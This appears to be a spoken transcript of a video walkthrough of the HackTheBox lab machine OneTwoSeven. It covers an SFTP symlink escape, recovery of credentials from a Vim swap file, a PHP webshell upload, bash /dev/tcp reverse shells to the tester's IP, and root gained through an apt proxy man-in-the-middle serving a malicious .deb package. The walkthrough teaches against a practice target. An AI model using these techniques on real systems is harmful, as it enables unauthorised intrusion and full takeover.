What's going on, YouTube? This is Ipsec. We're doing 127 from HackTheBox, and the box's name is a reference, obviously, to 127 or 127.0.0.1, which is the loopback address, and that comes in handy because one of the steps on this box is to actually pivot onto a service that's listening on 127.0.0.1. When you pop that service, you get on the box, and then there's a vulnerable apt configuration, the package management on the box. Man the middle of that to get root. So with that being said, let's just jump in. As always, we'll begin with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it 127, and then the IP address, which is 10.10.10.133. Can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and its banner says it's a Debian box. Then we have HTTP on port 80, and is running Apache HTTPD. We could look at these versions and kind of figure out exactly what version of Debian this is, but I'll leave that as an exercise for you. Let's go just jump ahead and look at what's on the web page. Navigating to 10.10.10.133, we just see a page, and the subtitle on that first one was "There is no place like OneTwoSeven, your free homepage hoster." So this tells us two things. This is kind of a pun on "There's no place like home," because 127 is the loopback address. So we kind of know what the box means. May want to start a cherry tree document, creating a subnode called like interesting, and then just say 127 is a reference to home, which is the loopback address. Clicking around the little carousel, we can see they provide static web hosting for interested people. Sign up to get your unique username and password. We'll do that in a little bit. Let's just keep looking at the website. I find if you just go and try to rush through the website, you may miss hints or things or what the page is about. So it's always important to go through and fully enumerate. It says coming soon, IPv6. So we can put that in interesting. Potential of IPv6. So always keep that in mind. And then this goes back to the beginning. So we have secure SFTP upload. So there should be SFTP service. Sign up says you get an account. Static file hosting. It looks like they wanted to provide PHP hosting, but they could not master chroot handling for Apache. So we may just want to make a reference that chroot is interesting, because that could give us a hint later on saying why they did not use PHP. This is another reference to IPv6. And then here is a reference saying that they have some type of DOS protection. So we won't heavily enumerate the website with like go buster, do it full port scan on nmap, etc. Just in case they do have something blocking, we don't want to get blocked because that just eats up time. So let's go check out the other links. Statistics looks like a static page or something. We just see no links. We don't know what we could put here. We could try admin equals 1 or something in fuzz parameters, see if we could change this. But right now we have no idea how we could change this, so we'll just move on. Looking down at these bottom links, we have privacy going to stats.php, terms stats.php, there is attribution.php, so clicking this, and it looks like this is just giving references to where all the pictures came from on this website. And we have the same fail to ban configuration that's on lightweight and CTF. So if you want to enumerate that, we can, of course, go to those machines and look at what type of DOS protection is in place. So let's go back to home and click sign up today. And it says your personal account is ready to be used. Username is this, password is this. You can use the provided credentials to upload your page via SFTP and then this host name. So it finally leaked the host name of this website. So we'll just add this into the host file. So 10.10.10.133 is 127.htb. And it says your personal homepage will be available here. looking at this link, I guess the cache hasn't happened yet. But if we copy this, we can paste it. Link location. Paste it in cherry tree. We can see the little squiggly and then a username. This is a reference to like Apache home directories. So we can potentially enumerate other users on this box. So we'll just do squiggly does not exist to see what happens. The requested URL doesn't exist. We can try root. And it says root was not found on the web server, which is the same error as the other one. So maybe it's not a way to enumerate all users. If we go to the specific one it said, let's put 10, 10, 10, 127. Not 127, 133. I think 127 was the box I did last week. We just get a blank index page. So let's go and try to log in. Before I do that, go back. We need to copy the username and password. So let's go back to cherry tree, go up, creds, and paste. So now we can go log in. To do that, all we'll type is SFTP, the username, @ and then the IP address. So we'll do 1221, nope, IP address, and then it'll ask us for the password. So accept that, paste the password, and now we're connected via SFTP. So we got this public HTML directory. Going into that leads us to index.html. So what I'm going to do is make, we'll do test.php and test out that they only allow static web hosting. So we'll just do PHP, and we can do PHP info like that. You may want to do like echo or a statement that's not on the like PHP disabled functions if safe mode is enabled, but I'm not going to worry about that right now. So upload it via put test.php, and we can see it's been uploaded. So go to Firefox, and we can try to execute test.php. We have to do that little squiggly to go in my home directory, and then we can do test.php. And we get forbidden. You don't have permission to access this, so let's try a few other extensions. We can move test.php to test.php 7, upload test.php 7. It's put, not upload. And then we'll also do like test.txt, just seeing what extensions it allows us to do. So if we do PHP 7, we still get forbidden. If we do .txt, we can read the file. So doesn't look like we really have anything right now since we can't execute code. If we go back to the interesting tab and kind of read over our notes, we can see that chroot is mentioned. And if you do a help here, we can see that Symlink is a command, just reading through this. And I originally found this when I was looking for a way to change the permission of a PHP script if it had like a chmod, which it does. So I was trying to do like, chmod like 755 test.php 7 and see if that fixes it. Hanging ls chmod test.php to see if we could like change the permissions on this to execute it, but we can't. However, there is that symlink command, and chroot is a command that just prevents you from going up directories. Essentially, it changes the root directory, and they said they can't figure out how to do it on Apache, so we can try this symlink command. So we'll symlink / which is the root directory, to, we'll just call this please subscribe. And it helps if we can spell correctly. Can't symlink slash to this. We get rid of the slash. There we go. So it can't end in a slash. So now when we go here, we can do slash please subscribe, and we get into the root of the file system, and we can view a few files. Looks like we don't have permission to see the directory listing of Etsy, but if we entered files within this, we can get files, and it's odd to see only 2 accounts in Etsy past WD, but it is what it is. We can also see the shell is set to bin false, so that is what will prevent us from doing like SSH and then the username and password. So if we do this, 133, we can't just SSH in. So let's go back to, where was I? Oh, Firefox, that's right. And just look at what other files we have. So there is home. We don't have permission to go into this. We could go back to the website, and do we have a way to see other users on this box? Because it says there's 2 users. Oh wait, we do. It's Etsy past WD. So we are probably the second user, I would guess. YZ. Okay, so we could try going to slash home and then the other guy to see if we can get in that directory. And we get directories not even found. So can't do anything there. Just going through this, the user directory, nothing there. Var dub. Then we got 2. We got HTML-admin and HTML. So if we go to HTML-admin, we have the carousel.css and a swap file. So we can try to download this. And then we could also go to like HTML, and it directs us back to index.php. And that is because when we first went to 10.10.10.133, let me turn intercept on so we can see exactly what happens. Go to Burp, Proxy, it's on. Go here. We get this page as moved, and then it directs us to the new page. So when we hit that index.html, it redirects us here. So this is going to be a second way to do it. We will get to this swap file in just a second, but I want to show the second way to do this. Let's just turn intercept off. And then go back a few times. Is it this one? Okay. So we could get files out of this directory if we go back to our terminal, and we could also do symlink /var html index.php, and then link it to like index.txt. So now when we go to our home directory /index.txt, we see the contents of index.php. So that is 2 ways to do it. So let's save this file real quick. Make dir source leak. Go in here, v index.php, paste this file, and then let's just move that file we had downloaded, this login.php.swap file here. And then if we look at it with like less, we see it looks weird. The magic bytes say Vim, so we know this is a Vim file. If we did file against that as well, it would say it's a Vim swap file. And whenever you open something within Vim, it creates that swap file in case it closes unexpectedly, so you can restore the file. So if we did a new window and do vim index.php and now do ls-la to show everything including hidden files, we see it created a .index.php.swap. If we file that, we can see it is a Vim swap file. We exit this gracefully, ls-la, that file's gone. So the file has to begin with a period since it's a hidden file and end in .swap. So let's move login.php.swap to .login.php.swap. And now when we vim login.php It's going to ask us if we want to recover. I'm just going to quit this to get my terminal correct. So we'll hit R to recover, and then it says it has recovered and it's saving it to login.php. And here we go. So in login.php, at the very beginning, we see a PHP statement. If server port is not equal to 680, die. So that is a port we have not seen. If we nmap 10.10.10 133 680, we have to do -p 680. We get it is filtered. So there's something preventing us from accessing that port. Going down, let's look at other PHP. So there is a /login.php. And then we have if is set login, username, password, leaking a username right here. So let's copy this, go back here, go to creds. Whoa, that copied way too much. Let's go back here and go to the beginning, press V to enter visual mode, go to the right, double quote plus Y to yank, and that should appear on a clipboard. There we go. And then we'll do the same thing for this hash. We should be able to double click this. Maybe not. Maybe click and highlight. There we go. And then double quote plus yank to put it on a system clipboard. And remember, it ends in 8. I'm not sure if I highlighted until D or 8. And it looks like I highlighted until D. So let's copy this because that looks like a hash. So let's go here, echo-n, and do wc-c to count the characters, 64 characters. So what hash type is 64 characters? It's probably hash identifier. So will a SHA-256 have 64 characters? So it's a SHA-256 sum. And if it's just a straight SHA sum, we can probably just go to hashes.org and find it that way. Hashcat can decrypt it, but it's always faster if there is a pre-computed hash. So just click on hash and then I think search. There we go. Paste it in. V8DXBMB. And we can see that password has been cracked to home sweet home 1. So get rid of the hash, and we just put that there. So the next thing to do is figure out where this hash is used. And if you remember, we had downloaded 2 files. We had downloaded index.php and login.php. If you go to the home page again, this admin thing was blacked out, so we can't click on it. So let's go look at index.php and see why that is. So if we just do a search on admin, we can see if server remote address is equal to 127.0.0.1 or 104.240.54, I have no idea what this address is, then enable this link, else disable it. And it's going to 127.htb:680. And we had already nmapped that, and we get port is filtered. We can try -st for a TCP scan, but it is still filtered. We could do -pn to disable host discovery, but nothing. The one thing we know about this box is that it has an SSH service running, and SSH does support tunneling. So if they don't have gateway ports disabled, we may be able to do a port forward through this. So if we do SSH and then the username, so let's go back here, grab this at 10.10.10 and before the username, we want to do -L for a local port forward and say port 680 on our local box now goes through this tunnel into 127.0.0.1 port 680. And I'll put a link in the description below if I remember to a video where I explain port forwarding in depth with PowerPoint. But for now, just know This will open a port on my local box and then go through the SSH connection and send it to this socket. So doing this, and then the password says this service allows SFTP connections only, because we attempted to start a SSH connection in a full shell after this. If we just do the -n flag in SSH, which is don't execute commands, this is useful for just forwarding ports, we don't get that error message. So paste the password. We don't get any prompt back, but if we look at our open ports, ALMP, grep 680, we can see our local host is listening on port 680. So if we go here and do localhost 680, we get the new page, 127 administration, administrative backend for administrative use only, and a username and password. In login.php, we had found this password, so let's just try logging in with the credentials we had, ots-admin and home sweet home 1. Click login, and we get to a bunch of things. We have plugin upload admin only, and this submit query button is disabled, can't click it, and it says disabled for security reasons. So let's just go through each of these things. If we click on default user, it gives us default user credentials. This is a user we don't have, so we could try accessing that guy's directory. If we go here, it's the same thing. We can also open up a SFTP connection there and see if he has anything. What's his password? Shoot, it's in a different tab. Copy this. 10.10.10.133. Paste it. Do a ls, and we get user.txt. So ls public HTML, and it's still just got that one file. We could do -a to view hidden files, and it doesn't look like there's anything hidden. We can verify we can get user.txt, and then do wc-c on it. We can also see the size here, which is 32 characters in a line break. So that is the user portion of this box. We can keep going on. We should probably record these credentials. And this will be HTTP admin. So there is this DL feature. If we click it and open the file with our text editor, we can see it lets us download the script. So that may be useful. File backup. Who needs backups? Recovery is the only thing we need. If we click DL on this to see what this script is, it is literally a PHP script that says that. So let's keep going down the list. And just based upon this, looking at this URL, I can tell that it's just doing an include statement here. So the code looks like that. So it executes anything you put into this parameter. So if there was like a directory traversal, so we could do like .. and then var HTML dub. Oh, not. It would be home and then a username. And then we can try, public HTML and then index.html. We could try that to see if this works, but it doesn't. We just get unknown plugin type. So I was trying to get this add-on parameter to include a unintended file, and that did not work. So going down, we do have this addon-manager, and this one's not showing us the source code. It is showing us, however, the looks like Apache rewrite engine rule. So this is saying in the URL, look for addon-upload.php or addon-download.php and rewrite that name to this. And then this bracket L bracket means last, which means stop processing the rules after this. So let's look at the source code to addon-manager, and I'm just going to download this because it'll make it a little bit easier. And let's go to a new shell, and we can move downloads, what was the name? Probably OTS add-on, there we go, into source leak, and then just look at this. So we can see if the script detects a /addon-upload.php, go to some functionality to upload code. If it has addon-download.php, go to a place to download the PHP file. So that is how this DL button is working. So we can see addon-download.php and then addon equals ots-fs.php. I think that's how it's working. Yeah, /addon.download. And it's doing that by the whole URL name. So we may be able to trick this script into doing this addon-upload.php. And I say trick it because we have this Apache rewrite engine. So if we created a URL to go to /addon-download.php or we can just do and addon/upload. If we hit this, we'll get into this functionality. If we didn't do this addon-download.php and just called that script, then we'll have this rewrite engine overwrite this addon-upload with the addons OTS whatever. But if we leave this to addon-download.php, the HTTP rewrite engine will see addon-download.php, overwrite that with this addon/ots-man addon.php, and then leave this one alone because you have this ~L bracket, which means stop processing rules. So we'll hit the source code of this, and then it will look in the URL because here is the variable it's compared against, request URI, and it will see this /addon-upload.php and let us in the code. So let's test this whole theory out. So if we copy this piece of the URL, oh, we don't want to copy this. We just want to do addon-download.php like this. Copy. Let's turn our burp intercept back on. We can just refresh the page to get a GET request. Control-Shift-R. We're on default, so turn Burp Suite on. Come on. There we go. Send this over to the repeater tab. And now we're going to want to look at what mode we want to do this in. Is it a post request or is it a GET request? So if is set files addon, file size, I'm guessing this wants to be a post request because we have to do a file upload. So because we have to do a file upload, we're going to change this request up a little bit. So we'll just turn intercept off real quick, turn it back on, and we just want to get a upload HTTP request because we don't have to want to manually create this. So let's go to this browse and just upload a random file. So we'll go to root HTTP boxes 127, and we'll do test.txt. So we can open this, and now we need to click this submit query button. So I'm going to hit Alt, go to Tools, Web Developer, toggle Tools, click on Inspector, and pick an element of the web page. I'm going to pick this button and say, hey button, you were no longer disabled, and just edit that HTML, and suddenly we can click it. So we can close this. We have intercept on here, clear out a forwarding cache, submit query, and now we suddenly have this repeater request. If we clicked forward, we just get that file does not exist because it is rewriting this URI. If we clicked send in this, yeah, 404 not found. So that is rewriting this URL again to that. So what we have to do is go back. Did I get rid of it? I got rid of it. Okay. So go back to the page. We want to make a request to addon-download.php, and we just got to put something in the URL. So we can do this. And instead of doing PHP info, let's do request, please subscribe. And we have to encapsulate that in system brackets if we want to execute it with system. Okay, and the file name, where is file name? Right here. Instead of test.txt, let's do patreon.php. So click send. We get file has been uploaded successfully. So let's see if we can find this patreon.php file. So turn intercept off, which it is, and then just try /patreon.php. Has not been found. So the directory could be addons/patreon.php. So let's do addons patreon.php, and we don't get a 404 error. It's just a white screen. So if we do $please subscribe equals who am I, we get www-admin-data. So now we have verified we have code execution. Let's turn intercept on, refresh the page, send it over to the repeater tab, and then we can say rename this one to be file upload, and then rename this one to be get shell, and this we can just close that. So we'll just change the request method to a post request because it's easier to work with data down here, and do --c, then --i. It's bracket and dev TCP 10.10.14.3, which I believe is my IP. If config ton 0, it is my IP. / we'll do port 9001, 0 bracket and 1, and that thing, highlight everything, and then just press Control U to URL encode this. Go back to a terminal. We'll do or modify key and tmux, then comma. We'll call this shell-user. And nc lvnp 9001. So click send. We don't get a response back immediately, which is a good sign. And here we go. So the first thing I always do, python-c, import pty.spawn /bin bash to fix that. And then we do Control Z, stty, raw -echo, and then fg enter. So now we have a real shell. We can also do like export term is equal to xterm, so we can clear the screen if we want to, which is handy. So let's see what we can do as this user. The first thing I check normally before running like linenum is just checking sudo-l to see what we can do in sudo, and we see that www-admin-data may run the following commands on OneTwoSeven. We have apt-get update and apt-get upgrade. So whenever I see sudo can do something, I go straight to Firefox. Let's make sure intercept is off, and do GTFO bins. I don't have my Burp certificate. So let's just turn Foxy Proxy off for now. And then go to GTFO bins to get the frick out bins. And we do have a few things. So apt-get can get a shell and sudo. So if we look at this, we have, let's see, apt-get changelog apt. And then you just do ! bin sh. Going back to this though, we have to do apt-get update or apt-get upgrade. So that won't help us out here, because if we do apt-get upgrade or apt-get changelog, then we're going to get prompted for a password. We only don't get prompted for a password with those two commands I said earlier. So that won't help us. Sudo also doesn't really help us. And there's sudo apt-get update -o, and you got a pre-invoke command. But again, if we tried this, it asks us for the password. Going back to that sudo output though, we see an interesting setting: environment_keep, FTP proxy, HTTP proxy, HTTPS proxy, or no proxy. So it's going to keep our HTTP proxy when we do apt commands or any sudo. So if we do sudo apt-get update, we see this, and of course we can't resolve to any place. One interesting thing though, we have packages.127.htb. So if we went into etc apt and looked at sources.list.d, there is Devon, which looks like this is the main repo, and there's also 127.list, which has that packages.127.htb/Devon. So just something to keep in the mind. But let's try this whole proxy theory out. So the very first thing we're going to do is go back into Burp, and we're going to proxy options, and we're going to create a new listener. We're going to bind on port 8081 on the specific interface, which is our ton adapter. You could also do all interfaces, and redirect everything to 127.0.0.1 to port 80. Or we can do 8000 since that's the default of Simple HTTP Server. Click OK. And then we're also going to grab, what is the thing? cd sources.list.d, cat127.list, grab packages.127.htb, and we're going to add that in our host file. So our box knows to go to 127.0.0.1 whenever it sees packages.127.htb. And then we also have to start our Python server. So python-m, simple HTTP server. So now if we set the proxy up here, we're going to have apt go through the proxy, hit our Burp proxy, which is then going to redirect it to 127.0.0.1, which is going to be simple HTTP server. So let's do sudo-l http_proxy is equal to http 10.10.14.3:8081. Man, that sucks. Do env so we can make sure the proxy's set. Grep http. Did not. We have to do export space. Did I do that? I did not. So you want to do, we'll just type in burp decoder export http proxy is equal to 10.10.14.3:8081. I think that's exactly what I typed. But you can confirm it when you type env and see that environment variable. Now if we do apt-get update, sudo apt-get update, we can see the server is requesting a bunch of files from us. So now all we have to do is trick it into downloading files from us. And we see these warnings and error messages. And this one is interesting. It's never reached out to packages.127.htb because it doesn't have a release file, so the repository can't be authenticated. This deb.devon just says it can't be done securely, so it's disabled because it's talked to a release file. So the release file is kind of just like a SSH private key. Think of it that way. And it's just a way to identify if you're being man-in-the-middled. Because there is no release file for this packages.127.htb, and this machine has never seen a release file for that, there's no way for it to validate who this guy is. And if there's no way to validate who he is, then anyone can become him. So that's what we are going to do. So we'll go back to our box, go into this www directory, and it's making a request to /devon. So let's make directory devuan. And now we have to figure out exactly what he's querying. We can go through these for packages.gz and just look through. And we can see it wants to go into devon dis ASCII main binary. So going to make this directory. So make dir -p dis ASCII main whatever. And we're going to leave that there for now because the packages file that we create is going to have MD5 sums and stuff. Actually, let's just do that now. So let's go into that directory and let's see. Let's go back to the error messages, or we'll go to Burp and go to a proxy, HTTP history, and see if he's ever trying to go to, there we go, deb. We just want to get a example packages file. So go here. Okay, devon dis. Then it was like ASCII. What did we create? ASCII main binary AMD64. So ASCII main. So packages is not binary AMD64. We can just do packages.gz. Save the file. Move. Downloads packages here. Gunzip to uncompress it. Go to edit it. And we just want to take one package. So I'm hitting 1 and a bunch of zeros, then DD to delete all lines. And we have example packages. So let's go back to a shell. And just do a dpackage-l to look at things we could replace. This is going to show us what is installed. So I'm going to, let's pick telnet, because I don't think many things will depend on telnet, so probably don't have to worry about it. So we'll do telnet. Let me just copy this. Go here. Paste. So the package name is going to be telnet. We probably don't need the source. The version has to be higher than this. So we'll do 0.17, or we'll do 18-leet. The installed size, I don't think we need. Maintainer, we can put whatever we want here. So we'll just do please subscribe. Architecture, our package is AMD64, so we'll leave that. Let's get rid of dependencies. Description, we'll do pwned. Delete this. Homepage, probably don't need. Section, I don't think we need this. I'm just going to put all. Priority, we'll change this to required. Again, probably don't have to. File name, we'll just put it in the root and we'll call it telnet.deb. And then these last four, I don't think you need MD5 or SHA, you just need SHA-256. These last two things we'll do after we create the binary. So save that, and then let's go to Firefox, and actually, to make this easy, pwd, copy all this, b packages, file name. There we go. So now it's going to look in the same directory as a packages file for a telnet binary, so we don't have to go jumping back and forth through directories. But now we have to make a malicious telnet binary, or telnet package. So we can make dir telnet, and then go to Google and say make malicious deb file, and see how do we do that. There is a tool called Derby. I don't want to use this Python tool because it'll take the fun out of learning how it works. So let's just go examine it. So we can see this is just calling core generator import generator. So let's look at this function, core generator.py. Let's see, it's going in packages Debian. And let's see. And then does build package. This is harder to read than I thought it would be. Control. Okay. So you got package/Debian, and you need a control file and a post install file. So let's go in here, make dir Debian, go into Debian, v control, and then we go back, go to Derby, go to templates, and look at the template they use for control. So paste, architecture, we want AMD 64, version, we'll need to change that, and the maintainer will change. So package is telnet. And then let's just go to www, all this, one more directory, cat packages, the maintainer, please subscribe, and the version is going to be 0.18-leet. Okay. Description, we can also put pwned. So now we got that. So now we got to create the post install file. So v post inst. We go back to templates, post inst, and it's doing something different, but this is just a bash script. So we can do that, and then the same exact command. So bash-c, bash-i, that dev tcp 10.10.14.3, port 9001, and then 0, 1, like that, I think. If we go back to Burp, go to our repeater tab, get shell, Control-Shift-U to URL encode, we can see exactly the command we ran, which that is the same thing. And we can reuse 9001 because once our telnet connects, it's no longer listening on the port. So if we do netstat -alnp grep 9001, we can see that socket is established, but we don't have one that is listening. So we could do nclvnp 9001, do that again, and you can see there is one listening. So pretty cool. So there's that. We want a chmod 755 on the post install. And now we just have to make the package. So going over to Firefox and looking at the generator, it just does a dpackage-deb and --build. So dpackage-deb --build telnet, And we have now created the telnet.deb package. So let's do du-b for bytes, or we can just read here and get 728. Let's specify .deb and get 728 bytes. And we also want to do a SHA-256 sum on that and get this long string. So let's go into packages. Did I say 728? Hopefully. And SHA-256. There we go. I did. So let's compress the packages with gzip. And there we go. So now, when we do apt update, it should pull that packages.gz file, which will tell it to update telnet. So let's test this out. Let's do sudo apt-get update. And let's see. Reading, it did not. That is bizarre. So let's see. Did we get packages.gz? It did one on 200. So maybe it just won't tell us. Maybe it's just hiding within all these errors. Let's do apt-get upgrade. Because I verified that, where'd it go? The server did a GET request on this and pulled it, since that's a 200 and everything else is 404. So sudo apt-get upgrade, and it says the following package will be upgraded, telnet. So let's do yes to continue. The following package cannot be authenticated. Do you want to upgrade? And this is because of that whole release file thing. The server doesn't have it, so it can't authenticate. But let's do yes anyways. And shoot. I was not listening on the port. NC LVNP 9001. We'll do it down there actually. Hopefully it'll still work. Or we have to pick a different package. Not fully installed or removed. Sure. Okay, sweet. It still worked. So do a ls or who am I. I can type who am I. We are root. Go into /root wc-c root.txt, and we can read that file. So that is the box. Hope you guys enjoyed. Take care, and I will see you all next week.